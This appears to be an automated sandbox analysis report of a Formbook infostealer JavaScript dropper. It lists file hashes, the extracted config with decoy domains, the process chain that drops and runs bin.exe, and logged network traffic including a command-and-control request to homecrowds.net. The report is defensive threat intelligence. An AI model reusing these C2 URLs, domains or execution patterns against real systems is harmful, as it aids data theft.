Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2024 00:59

General

  • Target

    ySNxzGtmAt_bin.js

  • Size

    343KB

  • MD5

    2c1b8ce86a48542a827bb302d54eb19c

  • SHA1

    6c5b668d122791450edb50027312f22d22eeb39b

  • SHA256

    c89f8224348c1c86bf84db8a6596f1ff4fdad498669918393fc6325b7a1476e8

  • SHA512

    88bcb4feb1e9a0dfc378d106faa5e979c1505c17483e9ae7e68e8782f0563ca0248f712f0f1b384d7c97b7ef65e0665b72af28a5b9852c030cedec7c67ab5e65

  • SSDEEP

    6144:P+58K9NNqVEmncYRk/ykRCa7ljUuqeYGEirkxMdv1K8glhknGC80F0+WwpOj:lK9NNqVEGVRk/ykRCaRjUGHjrkSXK8gT

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

t01w

Decoy

yeluzishiyanshi.com

thehardtech.xyz

arrowheadk8.site

zaulkunutila.xyz

lookastro.net

congregorecruitment.co.uk

darcyboo.uk

collettesbet.net

ltgpd.com

hiddenapphq.net

haxtrl.online

esenbook.com

jxzyyx.com

ulvabuyout.xyz

instashop.life

vazra.top

ewdvatcuce4.top

zhishi68.com

fabricsandfashion.com

hootcaster.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook family
  • Formbook payload 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3568
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\ySNxzGtmAt_bin.js
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4900
      • C:\Windows\System32\wscript.exe
        "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\qbXmtbQkpB.js"
        3⤵
          PID:2232
        • C:\Users\Admin\AppData\Local\Temp\bin.exe
          "C:\Users\Admin\AppData\Local\Temp\bin.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:748
      • C:\Windows\SysWOW64\wscript.exe
        "C:\Windows\SysWOW64\wscript.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Users\Admin\AppData\Local\Temp\bin.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1560

    Network

    • flag-us
      DNS
      149.220.183.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      149.220.183.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      81.144.22.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      81.144.22.2.in-addr.arpa
      IN PTR
      Response
      81.144.22.2.in-addr.arpa
      IN PTR
      a2-22-144-81deploystaticakamaitechnologiescom
    • flag-us
      DNS
      72.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      72.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      13.86.106.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      13.86.106.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      28.118.140.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      28.118.140.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      197.87.175.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      197.87.175.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      171.39.242.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      171.39.242.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      107.12.20.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      107.12.20.2.in-addr.arpa
      IN PTR
      Response
      107.12.20.2.in-addr.arpa
      IN PTR
      a2-20-12-107deploystaticakamaitechnologiescom
    • flag-us
      DNS
      www.vazra.top
      Remote address:
      8.8.8.8:53
      Request
      www.vazra.top
      IN A
      Response
    • flag-us
      DNS
      www.homecrowds.net
      Remote address:
      8.8.8.8:53
      Request
      www.homecrowds.net
      IN A
      Response
      www.homecrowds.net
      IN CNAME
      parkingpage.namecheap.com
      parkingpage.namecheap.com
      IN A
      91.195.240.19
    • flag-de
      GET
      http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G
      Explorer.EXE
      Remote address:
      91.195.240.19:80
      Request
      GET /t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G HTTP/1.1
      Host: www.homecrowds.net
      Connection: close
      Response
      HTTP/1.1 403 Forbidden
      content-length: 93
      cache-control: no-cache
      content-type: text/html
      connection: close
    • flag-us
      DNS
      19.240.195.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      19.240.195.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      www.omgsweepsship.com
      Remote address:
      8.8.8.8:53
      Request
      www.omgsweepsship.com
      IN A
      Response
    • flag-us
      DNS
      13.227.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      13.227.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      www.ulvabuyout.xyz
      Remote address:
      8.8.8.8:53
      Request
      www.ulvabuyout.xyz
      IN A
      Response
    • flag-us
      DNS
      www.adanarinoplasti.xyz
      Remote address:
      8.8.8.8:53
      Request
      www.adanarinoplasti.xyz
      IN A
      Response
    • flag-us
      DNS
      www.secure-internetbanking-help.com
      Remote address:
      8.8.8.8:53
      Request
      www.secure-internetbanking-help.com
      IN A
      Response
    • 91.195.240.19:80
      http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G
      http
      Explorer.EXE
      404 B
      376 B
      5
      4

      HTTP Request

      GET http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G

      HTTP Response

      403
    • 8.8.8.8:53
      149.220.183.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      149.220.183.52.in-addr.arpa

    • 8.8.8.8:53
      81.144.22.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      81.144.22.2.in-addr.arpa

    • 8.8.8.8:53
      72.32.126.40.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      72.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      13.86.106.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      13.86.106.20.in-addr.arpa

    • 8.8.8.8:53
      28.118.140.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      28.118.140.52.in-addr.arpa

    • 8.8.8.8:53
      197.87.175.4.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      197.87.175.4.in-addr.arpa

    • 8.8.8.8:53
      171.39.242.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      171.39.242.20.in-addr.arpa

    • 8.8.8.8:53
      107.12.20.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      107.12.20.2.in-addr.arpa

    • 8.8.8.8:53
      www.vazra.top
      dns
      59 B
      129 B
      1
      1

      DNS Request

      www.vazra.top

    • 8.8.8.8:53
      www.homecrowds.net
      dns
      64 B
      119 B
      1
      1

      DNS Request

      www.homecrowds.net

      DNS Response

      91.195.240.19

    • 8.8.8.8:53
      19.240.195.91.in-addr.arpa
      dns
      72 B
      156 B
      1
      1

      DNS Request

      19.240.195.91.in-addr.arpa

    • 8.8.8.8:53
      www.omgsweepsship.com
      dns
      67 B
      140 B
      1
      1

      DNS Request

      www.omgsweepsship.com

    • 8.8.8.8:53
      13.227.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      13.227.111.52.in-addr.arpa

    • 8.8.8.8:53
      www.ulvabuyout.xyz
      dns
      64 B
      129 B
      1
      1

      DNS Request

      www.ulvabuyout.xyz

    • 8.8.8.8:53
      www.adanarinoplasti.xyz
      dns
      69 B
      134 B
      1
      1

      DNS Request

      www.adanarinoplasti.xyz

    • 8.8.8.8:53
      www.secure-internetbanking-help.com
      dns
      81 B
      154 B
      1
      1

      DNS Request

      www.secure-internetbanking-help.com

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\bin.exe

      Filesize

      185KB

      MD5

      6b9e28b6f51709866a46b4a8b98a1b6f

      SHA1

      1dcbaffb6aa748637216c498f0fee1f6d399263a

      SHA256

      4d47123169619362bf77feb0a764db9f2773f51374eb7a4ec71cc6f9b01d15f6

      SHA512

      557e807c93283552e7da7f34c8002af3657cabdacfbeb86d5b4336250ef67ccaa54a46bc084105028fd331c6f0e012bd064d7021ca8220d0cbdc5a7a1577f362

    • C:\Users\Admin\AppData\Roaming\qbXmtbQkpB.js

      Filesize

      2KB

      MD5

      63eddccafac5a2d46e70ad8368008a2c

      SHA1

      999b0c61359b570044b0f0be55bc490322e80ae6

      SHA256

      5c571d13ce29d36517e2e42e2999627e8d58a3ce037117ab13a904c5fe9b0953

      SHA512

      0775702f1a89fa990c193a3fa123120d2d236535c7e5829a1f806bb4f6bdfd381cb2f2c7b5ab69bd906853110e6dfcc3db1cc3704f2db58ca112d0d7596bc930

    • memory/748-10-0x0000000001880000-0x0000000001BCA000-memory.dmp

      Filesize

      3.3MB

    • memory/748-12-0x0000000000190000-0x00000000001BF000-memory.dmp

      Filesize

      188KB

    • memory/748-11-0x00000000001AF000-0x00000000001B0000-memory.dmp

      Filesize

      4KB

    • memory/2520-14-0x0000000000500000-0x0000000000527000-memory.dmp

      Filesize

      156KB

    • memory/2520-15-0x0000000000500000-0x0000000000527000-memory.dmp

      Filesize

      156KB

    • memory/2520-16-0x0000000000B60000-0x0000000000B8F000-memory.dmp

      Filesize

      188KB

    • memory/3568-13-0x0000000002F70000-0x0000000003066000-memory.dmp

      Filesize

      984KB

    • memory/3568-17-0x0000000002F70000-0x0000000003066000-memory.dmp

      Filesize

      984KB

    • memory/3568-21-0x0000000007530000-0x00000000075CC000-memory.dmp

      Filesize

      624KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.